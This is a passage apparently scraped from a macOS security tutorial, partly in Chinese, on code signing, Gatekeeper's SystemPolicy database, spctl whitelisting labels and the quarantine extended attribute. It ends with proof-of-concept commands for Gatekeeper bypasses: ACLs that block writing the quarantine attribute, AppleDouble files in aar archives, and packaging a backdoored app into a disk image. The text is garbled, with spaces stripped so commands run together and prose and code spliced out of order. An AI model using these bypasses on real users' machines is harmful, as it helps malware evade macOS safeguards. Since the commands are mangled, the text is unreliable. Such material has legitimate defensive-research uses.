# Get signercodesign-vv-d/bin/ls2>&1|grep-E"Authority|TeamIdentifier"# Check if the app’s contents have been modifiedcodesign--verify--verbose/Applications/Safari.app# Get entitlements from the binarycodesign-d--entitlements:-/System/Applications/Automator.app# Check the TCC perms# Check if the signature is validspctl--assess--verbose/Applications/Safari.app# Sign a binarycodesign-s<cert-name-keychain>toolsdemo
# Open databasesqlite3/var/db/SystemPolicy# Get allowed rulesSELECTrequirement,allow,disabled,labelfromauthoritywherelabel!='GKE'anddisabled=0;requirement|allow|disabled|labelanchor apple generic and certificate 1[subject.CN] = "Apple Software Update Certification Authority"|1|0|Apple Installer
anchorapple|1|0|AppleSystemanchorapplegenericandcertificateleaf[field.1.2.840.113635.100.6.1.9]exists|1|0|MacAppStoreanchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
[...]
# Check if allowed - nopspctl--assess-v/Applications/App.app/Applications/App.app:rejectedsource=nousablesignature# Add a label and allow this label in GateKeepersudospctl--add--label"whitelist"/Applications/App.appsudospctl--enable--label"whitelist"# Check again - yepspctl--assess-v/Applications/App.app/Applications/App.app:accepted
隔离文件
在下载应用程序或文件时,特定的 macOS 应用程序,如 Web 浏览器或电子邮件客户端,会向下载的文件附加一个称为“隔离标志”(quarantine flag)的扩展文件属性。该属性作为一项安全措施,将文件标记为来自不受信任的来源(互联网),并可能携带风险。然而,并非所有应用程序都会附加此属性,例如,常见的 BitTorrent 客户端软件通常会绕过此过程。
</details>
然后使用以下命令**删除**该属性:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine
chmod+a"everyone deny write,writeattr,writeextattr"/tmp/testditto-c-ktesttest.zippython3-mhttp.server# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
mkdirtestechoa>test/aechob>test/becho._a>test/._aaaarchive-dtest/-otest.aar# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute
# Create an app bundle with the backdoor an call it app.appecho"[+] creating disk image with app"hdiutilcreate-srcfolderapp.appapp.dmgecho"[+] creating directory and files"mkdirmkdir-ps/appcpapp.dmgs/app/._app.dmgln-s._app.dmgs/app/app.dmgecho"[+] compressing files"aaarchive-ds/-oapp.aar